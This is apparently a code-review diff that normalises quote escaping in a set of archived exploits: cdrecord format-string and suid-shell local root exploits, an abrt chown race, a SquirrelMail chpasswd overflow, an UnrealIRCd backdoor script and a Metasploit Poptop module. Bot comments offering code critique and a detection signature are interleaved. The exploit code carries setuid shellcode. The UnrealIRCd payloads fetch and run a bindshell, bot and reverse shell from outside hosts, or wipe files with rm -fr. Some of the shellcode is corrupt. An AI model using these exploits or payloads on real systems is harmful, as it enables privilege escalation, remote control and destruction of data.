# scsibus: -1 target: -1 lun: -1
|
||||
# Warning: Open by \'devname\' is unintentional and not supported.
|
||||
# /usr/bin/cdrecord: No such file or directory. Cannot open \'. Cannot open SCSI driver.
|
||||
# /usr/bin/cdrecord: For possible targets try \'cdrecord -scanbus\'. Make sure you are root.
|
||||
# /usr/bin/cdrecord: For possible transport specifiers try \'cdrecord dev=help\'.
|
||||
# Warning: Open by 'devname' is unintentional and not supported.
|
||||
# /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
|
||||
# /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
|
||||
# /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
|
||||
# sh-2.05b# id
|
||||
# uid=0(root) gid=0(root) groups=503(wsxz)
|
||||
# sh-2.05b#
|
||||
#####################################################
|
||||
|
||||
$shellcode =
|
||||
\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\".#setuid 0
|
||||
\"\\x31\\xdb\\x89\\xd8\\xb0\\x2e\\xcd\\x80\".#setgid 0
|
||||
\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\".
|
||||
\"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\".
|
||||
\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\".
|
||||
\"\\xff\\xff/bin/sh\";
|
||||
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
|
||||
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
|
||||
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
|
||||
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
|
||||
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
|
||||
"\xff\xff/bin/sh";
|
||||
|
||||
$cdrecordpath = \"/usr/bin/cdrecord\";
|
||||
$nop = \"\\x90\"; # x86 NOP
|
||||
$cdrecordpath = "/usr/bin/cdrecord";
|
||||
$nop = "\x90"; # x86 NOP
|
||||
$offset = 0; # Default offset to try.
|
||||
|
||||
|
||||
|
@ -35,45 +35,45 @@
|
|||
$target = $ARGV[0];
|
||||
$offset = $ARGV[1];
|
||||
}else{
|
||||
printf(\" Priv8security.com Cdrecord local root exploit!!\\n\");
|
||||
printf(\" usage: $0 target\\n\");
|
||||
printf(\" List of targets:\\n\");
|
||||
printf(\" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\\n\");
|
||||
printf(\" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\\n\");
|
||||
printf(\" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\\n\");
|
||||
printf(\" 4 - Linux Mandrake 9.1 Cdrecord 2.0\\n\");
|
||||
printf(" Priv8security.com Cdrecord local root exploit!!\n");
|
||||
printf(" usage: $0 target\n");
|
||||
printf(" List of targets:\n");
|
||||
printf(" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
|
||||
printf(" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
|
||||
printf(" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
|
||||
printf(" 4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ( $target eq \"1\" ) {
|
||||
if ( $target eq "1" ) {
|
||||
$retword = 0x0807af38; #Mr .dtors ;)
|
||||
$fmtstring = \"%.134727238x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
if ( $target eq \"2\" ) {
|
||||
if ( $target eq "2" ) {
|
||||
# $retword = 0x08084578; #.dtors
|
||||
$retword = 0x08084684; #.GOT exit
|
||||
$fmtstring = \"%.134769064x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
if ( $target eq \"3\" ) {
|
||||
if ( $target eq "3" ) {
|
||||
$retword = 0x0807f658;
|
||||
$fmtstring = \"%.134745456x%x%x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
if ( $target eq \"4\" ) {
|
||||
if ( $target eq "4" ) {
|
||||
$retword = 0x0808c82c; #.GOT exit
|
||||
$fmtstring = \"%.134802669x%x%x%x%x%x%x%x%x%n:\";
|
||||
$fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
|
||||
}
|
||||
|
||||
printf(\"Using target number %d\\n\", $target);
|
||||
printf(\"Using Mr .dtors 0x%x\\n\",$retword);
|
||||
printf("Using target number %d\n", $target);
|
||||
printf("Using Mr .dtors 0x%x\n",$retword);
|
||||
|
||||
$new_retword = pack(\'l\', ($retword));
|
||||
$new_retshell = pack(\'l\', ($retshell));
|
||||
$new_retword = pack('l', ($retword));
|
||||
$new_retshell = pack('l', ($retshell));
|
||||
$buffer2 = $new_retword;
|
||||
$buffer2 .= $nop x 150;
|
||||
$buffer2 .= $shellcode;
|
||||
$buffer2 .= $fmtstring;
|
||||
|
||||
exec(\"$cdrecordpath dev=\'$buffer2\' \'$cdrecordpath\'\");
|
||||
exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");
|
||||
|
||||
|
||||
# milw0rm.com [2003-05-14]
|
||||
|
|
|
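Review bot: `$new_retshell = pack('l', ($retshell));` packs a variable that is not assigned anywhere in the visible hunks (only `$retword` is set per target), so `$new_retshell` is a dead value and, under `use warnings`, an "uninitialized value" warning; drop it. The banner `printf("Using Mr .dtors 0x%x\n",$retword);` is also mislabelled for targets 2 and 4, whose own comments say `#.GOT exit`. The quote unescaping in this hunk (`$target eq "1"`, `pack('l', ...)`) is correct.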
@ -26,19 +26,19 @@
|
|||
// $ ./a.out /etc/passwd
|
||||
// [ wait a few minutes ]
|
||||
// Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race...
|
||||
// Didn\'t win, trying again!
|
||||
// Didn't win, trying again!
|
||||
// Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race...
|
||||
// Exploit successful...
|
||||
// -rw-r--r--. 1 taviso abrt 1751 Sep 26 2014 /etc/passwd
|
||||
//
|
||||
|
||||
static const char kAbrtPrefix[] = \"/var/tmp/abrt/\";
|
||||
static const char kAbrtPrefix[] = "/var/tmp/abrt/";
|
||||
static const size_t kMaxEventBuf = 8192;
|
||||
static const size_t kUnlinkAttempts = 8192 * 2;
|
||||
static const int kCrashDelay = 10000;
|
||||
|
@ -57,27 +57,27 @@ int main(int argc, char **argv)
|
|||
|
||||
// First argument is the filename user wants us to chown().
|
||||
if (argc != 2) {
|
||||
errx(EXIT_FAILURE, \"please specify filename to chown (e.g. /etc/passwd)\");
|
||||
errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)");
|
||||
}
|
||||
|
||||
// This is required as we need to make different comm names to avoid
|
||||
// triggering abrt rate limiting, so we fork()/execve() different names.
|
||||
if (strcmp(argv[1], \"crash\") == 0) {
|
||||
if (strcmp(argv[1], "crash") == 0) {
|
||||
__builtin_trap();
|
||||
}
|
||||
|
||||
// Setup inotify, and add a watch on the abrt directory.
|
||||
if ((fd = inotify_init()) < 0) {
|
||||
err(EXIT_FAILURE, \"unable to initialize inotify\");
|
||||
err(EXIT_FAILURE, "unable to initialize inotify");
|
||||
}
|
||||
|
||||
if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) {
|
||||
err(EXIT_FAILURE, \"failed to create new watch descriptor\");
|
||||
err(EXIT_FAILURE, "failed to create new watch descriptor");
|
||||
}
|
||||
|
||||
// Start causing crashes so that abrt generates reports.
|
||||
if ((child = create_abrt_events(*argv)) == -1) {
|
||||
err(EXIT_FAILURE, \"failed to generate abrt reports\");
|
||||
err(EXIT_FAILURE, "failed to generate abrt reports");
|
||||
}
|
||||
|
||||
// Now start processing inotify events.
|
||||
|
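Review bot: `__builtin_trap();` on `strcmp(argv[1], "crash") == 0` together with `inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)` gives a clear behavioural signature for anyone writing detections around abrt: a process holding an inotify watch on /var/tmp/abrt while spawning a rapid series of children that die by SIGILL (the `ud2` that `__builtin_trap` emits on x86) under ever-changing names; the comment in this hunk explains that the renaming exists to sidestep abrt's rate limiting, so a burst of crash reports from differently named copies of one inode is the thing to alert on. The error handling itself is clean: every call here is checked and reported through `err()`/`errx()`.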
@ -90,7 +90,7 @@ int main(int argc, char **argv)
|
|||
char command[1024];
|
||||
|
||||
// If this is a new ccpp report, we can start trying to race it.
|
||||
if (strncmp(ev->name, \"ccpp\", 4) != 0) {
|
||||
if (strncmp(ev->name, "ccpp", 4) != 0) {
|
||||
continue;
|
||||
}
|
||||
|
||||
|
@ -99,9 +99,9 @@ int main(int argc, char **argv)
|
|||
strncat(dirname, ev->name, sizeof dirname);
|
||||
|
||||
strncpy(mapsname, dirname, sizeof dirname);
|
||||
strncat(mapsname, \"/maps\", sizeof mapsname);
|
||||
strncat(mapsname, "/maps", sizeof mapsname);
|
||||
|
||||
fprintf(stderr, \"Detected %s, attempting to race...\\n\", ev->name);
|
||||
fprintf(stderr, "Detected %s, attempting to race...\n", ev->name);
|
||||
|
||||
// Check if we need to wait for the next event or not.
|
||||
while (access(dirname, F_OK) == 0) {
|
||||
|
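Review bot: `strncat(dirname, ev->name, sizeof dirname);` and `strncat(mapsname, "/maps", sizeof mapsname);` pass the destination's total size as the limit, but strncat's third argument is the maximum number of bytes to append, so once the prefix is in place these calls provide no overflow protection; `strncpy(mapsname, dirname, sizeof dirname);` likewise sizes by the source and does not guarantee NUL termination. `snprintf(mapsname, sizeof mapsname, "%s/maps", dirname)` with a check on the returned length expresses the intent safely.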
@ -117,7 +117,7 @@ int main(int argc, char **argv)
|
|||
break;
|
||||
}
|
||||
|
||||
// This looks good, but doesn\'t mean we won, it\'s possible
|
||||
// This looks good, but doesn't mean we won, it's possible
|
||||
// chown() might have happened while the file was unlinked.
|
||||
//
|
||||
// Give it a few microseconds to run chown()...just in case
|
||||
|
@ -125,31 +125,31 @@ int main(int argc, char **argv)
|
|||
usleep(10);
|
||||
|
||||
if (stat(argv[1], &statbuf) != 0) {
|
||||
errx(EXIT_FAILURE, \"unable to stat target file %s\", argv[1]);
|
||||
errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]);
|
||||
}
|
||||
|
||||
if (statbuf.st_uid != getuid()) {
|
||||
break;
|
||||
}
|
||||
|
||||
fprintf(stderr, \"\\tExploit successful...\\n\");
|
||||
fprintf(stderr, "\tExploit successful...\n");
|
||||
|
||||
// We\'re the new owner, run ls -l to show user.
|
||||
sprintf(command, \"ls -l %s\", argv[1]);
|
||||
// We're the new owner, run ls -l to show user.
|
||||
sprintf(command, "ls -l %s", argv[1]);
|
||||
system(command);
|
||||
|
||||
return EXIT_SUCCESS;
|
||||
}
|
||||
}
|
||||
|
||||
fprintf(stderr, \"\\tDidn\'t win, trying again!\\n\");
|
||||
fprintf(stderr, "\tDidn't win, trying again!\n");
|
||||
}
|
||||
}
|
||||
|
||||
err(EXIT_FAILURE, \"failed to read inotify event\");
|
||||
err(EXIT_FAILURE, "failed to read inotify event");
|
||||
}
|
||||
|
||||
// This routine attempts to generate new abrt events. We can\'t just crash,
|
||||
// This routine attempts to generate new abrt events. We can't just crash,
|
||||
// because abrt sanely tries to rate limit report creation, so we need a new
|
||||
// comm name for each crash.
|
||||
static pid_t create_abrt_events(const char *name)
|
||||
|
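Review bot: `sprintf(command, "ls -l %s", argv[1]); system(command);` builds a shell command from the user-supplied path without quoting and into the fixed 1024-byte `command`, so a filename with spaces or shell metacharacters misbehaves and a long one overflows. Since the purpose is only to display the new owner, `execlp("ls", "ls", "-l", argv[1], (char *)NULL)` in a child, or simply printing `statbuf.st_uid`, which is already in hand from the `stat()` above, avoids the shell entirely.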
@ -169,35 +169,35 @@ static pid_t create_abrt_events(const char *name)
|
|||
// Choose a new unused filename
|
||||
newname = tmpnam(0);
|
||||
|
||||
// Make sure we\'re not too fast.
|
||||
// Make sure we're not too fast.
|
||||
usleep(kCrashDelay);
|
||||
|
||||
// Create a new crashing subprocess.
|
||||
if ((pid = fork()) == 0) {
|
||||
if (link(name, newname) != 0) {
|
||||
err(EXIT_FAILURE, \"failed to create a new exename\");
|
||||
err(EXIT_FAILURE, "failed to create a new exename");
|
||||
}
|
||||
|
||||
// Execute crashing process.
|
||||
execl(newname, newname, \"crash\", NULL);
|
||||
execl(newname, newname, "crash", NULL);
|
||||
|
||||
// This should always work.
|
||||
err(EXIT_FAILURE, \"unexpected execve failure\");
|
||||
err(EXIT_FAILURE, "unexpected execve failure");
|
||||
}
|
||||
|
||||
// Reap crashed subprocess.
|
||||
if (waitpid(pid, &status, 0) != pid) {
|
||||
err(EXIT_FAILURE, \"waitpid failure\");
|
||||
err(EXIT_FAILURE, "waitpid failure");
|
||||
}
|
||||
|
||||
// Clean up the temporary name.
|
||||
if (unlink(newname) != 0) {
|
||||
err(EXIT_FAILURE, \"failed to clean up\");
|
||||
err(EXIT_FAILURE, "failed to clean up");
|
||||
}
|
||||
|
||||
// Make sure it crashed as expected.
|
||||
if (!WIFSIGNALED(status)) {
|
||||
errx(EXIT_FAILURE, \"something went wrong\");
|
||||
errx(EXIT_FAILURE, "something went wrong");
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
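Review bot: `newname = tmpnam(0);` is the deprecated interface (glibc warns at link time) and returns a pointer into a static buffer, which is acceptable here only because the name is consumed by `link(name, newname)` before the next call; `link()` also fails with EXDEV when the executable and the temp directory sit on different filesystems, which the `err(EXIT_FAILURE, "failed to create a new exename");` message gives no hint of. Both assumptions are worth stating in the "Choose a new unused filename" comment.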
@ -30,17 +30,17 @@
|
|||
#include <sys/wait.h>
|
||||
|
||||
#define NOP 0x90
|
||||
#define Fuckpr0 \"./chpasswd\" /* you need modify it by yourself */
|
||||
#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */
|
||||
#define LOOP 2000 /* loop of bruteforce */
|
||||
|
||||
/* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */
|
||||
|
||||
char shellcode[] =\"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68\"
|
||||
\"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80\";
|
||||
char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68"
|
||||
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";
|
||||
|
||||
unsigned long get_esp() {
|
||||
|
||||
__asm__ (\"movl %esp,%eax\");
|
||||
__asm__ ("movl %esp,%eax");
|
||||
|
||||
}
|
||||
|
||||
|
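Review bot: The "after" side of this hunk is still corrupt: `char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68"` has lost every backslash in front of its hex escapes, so the array is plain ASCII text rather than the intended bytes, and the same loss turned the `\n` in the `printf` strings of the later hunks of this file into a bare `n` (`printf("[+] Bruteforce......nn");`). A quote-only unescape cannot restore dropped backslashes, so this file needs re-importing from a clean copy rather than patching. Unrelated to the escaping, `get_esp()` has no `return` statement after `__asm__ ("movl %esp,%eax");` and relies on `eax` surviving by accident, which is undefined behaviour and breaks under optimisation.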
@ -52,7 +52,7 @@ value = malloc(size);
|
|||
|
||||
if(value == NULL){
|
||||
|
||||
printf(\"ERROR:virtual memory exhausted...n\");
|
||||
printf("ERROR:virtual memory exhausted...n");
|
||||
|
||||
exit(-1);
|
||||
|
||||
|
@ -74,16 +74,16 @@ pid_t pid;
|
|||
|
||||
ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode);
|
||||
|
||||
printf(\"t-------------------------------------------------------n\");
|
||||
printf(\"t Squirrelmail chpasswd local root bruteforce exploit n\");
|
||||
printf(\"t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n\");
|
||||
printf(\"t http://www.ph4nt0m.net n\");
|
||||
printf(\"t#######################################################n\");
|
||||
printf("t-------------------------------------------------------n");
|
||||
printf("t Squirrelmail chpasswd local root bruteforce exploit n");
|
||||
printf("t code By Bytes<Bytes[at]ph4nt0m.org> 2004 n");
|
||||
printf("t http://www.ph4nt0m.net n");
|
||||
printf("t#######################################################n");
|
||||
|
||||
|
||||
sleep(1);
|
||||
|
||||
printf(\"[+] Bruteforce......nn\");
|
||||
printf("[+] Bruteforce......nn");
|
||||
|
||||
sleep(2);
|
||||
|
||||
|
@ -105,19 +105,19 @@ for(i=0; i < 150; i+=4){
|
|||
|
||||
}
|
||||
|
||||
printf(\"buf1 = %sn\",buf1);
|
||||
printf("buf1 = %sn",buf1);
|
||||
|
||||
execl(Fuckpr0,\"chpasswd\",buf1,buf2,0);
|
||||
execl(Fuckpr0,"chpasswd",buf1,buf2,0);
|
||||
|
||||
}
|
||||
|
||||
wait(&status);
|
||||
|
||||
printf(\"[-] Signal: #%in\", status);
|
||||
printf("[-] Signal: #%in", status);
|
||||
|
||||
if(WIFEXITED(status) != 0 ) {
|
||||
|
||||
printf(\"[=] Step.%i: 0x%xn[~] Exiting...n\",(j/2),ret_addr);
|
||||
printf("[=] Step.%i: 0x%xn[~] Exiting...n",(j/2),ret_addr);
|
||||
|
||||
exit(1);
|
||||
|
||||
|
@ -127,7 +127,7 @@ ret_addr += offset;
|
|||
|
||||
j += offset;
|
||||
|
||||
printf(\"[=] Offset:%d Use ret:0x%xn\",j, ret_addr);
|
||||
printf("[=] Offset:%d Use ret:0x%xn",j, ret_addr);
|
||||
|
||||
}
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
#
|
||||
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
|
||||
#
|
||||
# Exploits cdrecord\'s exec() of $RSH before dropping privs
|
||||
# Exploits cdrecord's exec() of $RSH before dropping privs
|
||||
#
|
||||
|
||||
cat > ./cpbinbash.c << __EOF__
|
||||
|
@ -17,14 +17,14 @@ int fd1, fd2;
|
|||
int count;
|
||||
char buffer[1];
|
||||
|
||||
/* Set ID\'s */
|
||||
/* Set ID's */
|
||||
setuid( geteuid() );
|
||||
setgid( geteuid() );
|
||||
|
||||
/* Copy the shell */
|
||||
if ((fd1=open( \"/bin/bash\", O_RDONLY))<0)
|
||||
if ((fd1=open( "/bin/bash", O_RDONLY))<0)
|
||||
return -1;
|
||||
if ((fd2=open( \"./bash\", O_WRONLY|O_CREAT))<0)
|
||||
if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
|
||||
return -1;
|
||||
while((count=read(fd1, buffer, 1)))
|
||||
write(fd2, buffer, count);
|
||||
|
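Review bot: `open( "./bash", O_WRONLY|O_CREAT)` lacks the mode argument that `O_CREAT` requires, leaving the new file's permission bits undefined until the `chmod` in the next hunk, and `while((count=read(fd1, buffer, 1)))` treats a `-1` error return as true, so a read error spins forever writing garbage; loop on `count > 0` and copy in blocks rather than through the one-byte `buffer[1]`.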
@ -33,8 +33,8 @@ close( fd1 );
|
|||
close( fd2 );
|
||||
|
||||
/* Priv the shell */
|
||||
chown( \"./bash\", geteuid(), geteuid() );
|
||||
chmod( \"./bash\", 3565 );
|
||||
chown( "./bash", geteuid(), geteuid() );
|
||||
chmod( "./bash", 3565 );
|
||||
}
|
||||
__EOF__
|
||||
|
||||
|
|
|
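Review bot: `chmod( "./bash", 3565 );` is a decimal literal; 3565 happens to equal octal 06755, so the mode is what the surrounding code intends, but it reads like a typo and `06755` is the conventional spelling. Since the heredoc delimiter `__EOF__` is unquoted, any `$` or backtick inside the embedded C would be expanded by the shell before gcc sees it; none appear in the visible lines, but quoting the delimiter (`<< '__EOF__'`) removes the hazard.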
@ -7,53 +7,53 @@ use Socket;
|
|||
use IO::Socket;
|
||||
|
||||
## Payload options
|
||||
my $payload1 = \'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &\';
|
||||
my $payload2 = \'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &\';
|
||||
my $payload3 = \'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &\';
|
||||
my $payload4 = \'AB; killall ircd\';
|
||||
my $payload5 = \'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *\';
|
||||
my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &';
|
||||
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';
|
||||
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';
|
||||
my $payload4 = 'AB; killall ircd';
|
||||
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';
|
||||
|
||||
$host = \"\";
|
||||
$port = \"\";
|
||||
$type = \"\";
|
||||
$host = "";
|
||||
$port = "";
|
||||
$type = "";
|
||||
$host = @ARGV[0];
|
||||
$port = @ARGV[1];
|
||||
$type = @ARGV[2];
|
||||
|
||||
if ($host eq \"\") { usage(); }
|
||||
if ($port eq \"\") { usage(); }
|
||||
if ($type eq \"\") { usage(); }
|
||||
if ($host eq "") { usage(); }
|
||||
if ($port eq "") { usage(); }
|
||||
if ($type eq "") { usage(); }
|
||||
|
||||
sub usage {
|
||||
printf \"\\nUsage :\\n\";
|
||||
printf \"perl unrealpwn.pl <host> <port> <type>\\n\\n\";
|
||||
printf \"Command list :\\n\";
|
||||
printf \"[1] - Perl Bindshell\\n\";
|
||||
printf \"[2] - Perl Reverse Shell\\n\";
|
||||
printf \"[3] - Perl Bot\\n\";
|
||||
printf \"-----------------------------\\n\";
|
||||
printf \"[4] - shutdown ircserver\\n\";
|
||||
printf \"[5] - delete ircserver\\n\";
|
||||
printf "\nUsage :\n";
|
||||
printf "perl unrealpwn.pl <host> <port> <type>\n\n";
|
||||
printf "Command list :\n";
|
||||
printf "[1] - Perl Bindshell\n";
|
||||
printf "[2] - Perl Reverse Shell\n";
|
||||
printf "[3] - Perl Bot\n";
|
||||
printf "-----------------------------\n";
|
||||
printf "[4] - shutdown ircserver\n";
|
||||
printf "[5] - delete ircserver\n";
|
||||
exit(1);
|
||||
}
|
||||
|
||||
sub unreal_trojan {
|
||||
my $ircserv = $host;
|
||||
my $ircport = $port;
|
||||
my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => \"tcp\") || die \"Failed to connect to $ircserv on $ircport ...\\n\\n\";
|
||||
print \"[+] Payload sent ...\\n\";
|
||||
if ($type eq \"1\") {
|
||||
print $sockd \"$payload1\";
|
||||
} elsif ($type eq \"2\") {
|
||||
print $sockd \"$payload2\";
|
||||
} elsif ($type eq \"3\") {
|
||||
print $sockd \"$payload3\";
|
||||
} elsif ($type eq \"4\") {
|
||||
print $sockd \"$payload4\";
|
||||
} elsif ($type eq \"5\") {
|
||||
print $sockd \"$payload5\";
|
||||
my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...\n\n";
|
||||
print "[+] Payload sent ...\n";
|
||||
if ($type eq "1") {
|
||||
print $sockd "$payload1";
|
||||
} elsif ($type eq "2") {
|
||||
print $sockd "$payload2";
|
||||
} elsif ($type eq "3") {
|
||||
print $sockd "$payload3";
|
||||
} elsif ($type eq "4") {
|
||||
print $sockd "$payload4";
|
||||
} elsif ($type eq "5") {
|
||||
print $sockd "$payload5";
|
||||
} else {
|
||||
printf \"\\nInvalid Option ...\\n\\n\";
|
||||
printf "\nInvalid Option ...\n\n";
|
||||
usage();
|
||||
}
|
||||
close($sockd);
|
||||
|
|
|
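Review bot: `$host = @ARGV[0];`, `$port = @ARGV[1];` and `$type = @ARGV[2];` use one-element array slices where scalars are meant; Perl warns "Scalar value @ARGV[0] better written as $ARGV[0]" and the idiomatic form is `$ARGV[0]`. Pre-existing in the archived exploit, so leaving it for fidelity is defensible, but it deserves a note. The `\\n` to `\n` conversion inside the double-quoted `printf` and `die` strings is correct: the stored form would have printed a literal backslash followed by `n`.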
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Poptop Negative Read Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Poptop Negative Read Overflow',
|
||||
'Description' => %q{
|
||||
This is an exploit for the Poptop negative read overflow. This will
|
||||
work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
|
||||
currently do not have a good way to detect Poptop versions.
|
||||
|
@ -31,44 +31,44 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Using the current method of exploitation, our socket will be closed
|
||||
before we have the ability to run code, preventing the use of Findsock.
|
||||
},
|
||||
\'Author\' => \'spoonm\',
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 11114 $\',
|
||||
\'References\' =>
|
||||
'Author' => 'spoonm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 11114 $',
|
||||
'References' =>
|
||||
[
|
||||
[\'CVE\', \'2003-0213\'],
|
||||
[\'OSVDB\', \'3293\'],
|
||||
[\'URL\', \'http://securityfocus.com/archive/1/317995\'],
|
||||
[\'URL\', \'http://www.freewebs.com/blightninjas/\'],
|
||||
['CVE', '2003-0213'],
|
||||
['OSVDB', '3293'],
|
||||
['URL', 'http://securityfocus.com/archive/1/317995'],
|
||||
['URL', 'http://www.freewebs.com/blightninjas/'],
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
# Payload space is dynamically determined
|
||||
\'MinNops\' => 16,
|
||||
\'StackAdjustment\' => -1088,
|
||||
\'Compat\' =>
|
||||
'MinNops' => 16,
|
||||
'StackAdjustment' => -1088,
|
||||
'Compat' =>
|
||||
{
|
||||
\'ConnectionType\' => \'-find\',
|
||||
'ConnectionType' => '-find',
|
||||
}
|
||||
},
|
||||
\'SaveRegisters\' => [ \'esp\' ],
|
||||
\'Platform\' => \'linux\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Targets\' =>
|
||||
'SaveRegisters' => [ 'esp' ],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[\'Linux Bruteforce\',
|
||||
{ \'Bruteforce\' =>
|
||||
['Linux Bruteforce',
|
||||
{ 'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbffffa00 },
|
||||
\'Stop\' => { \'Ret\' => 0xbffff000 },
|
||||
\'Step\' => 0
|
||||
'Start' => { 'Ret' => 0xbffffa00 },
|
||||
'Stop' => { 'Ret' => 0xbffff000 },
|
||||
'Step' => 0
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 9 2003\'))
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 9 2003'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
@ -77,26 +77,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]),
|
||||
OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]),
|
||||
OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]),
|
||||
OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]),
|
||||
OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]),
|
||||
OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),
|
||||
OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),
|
||||
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
|
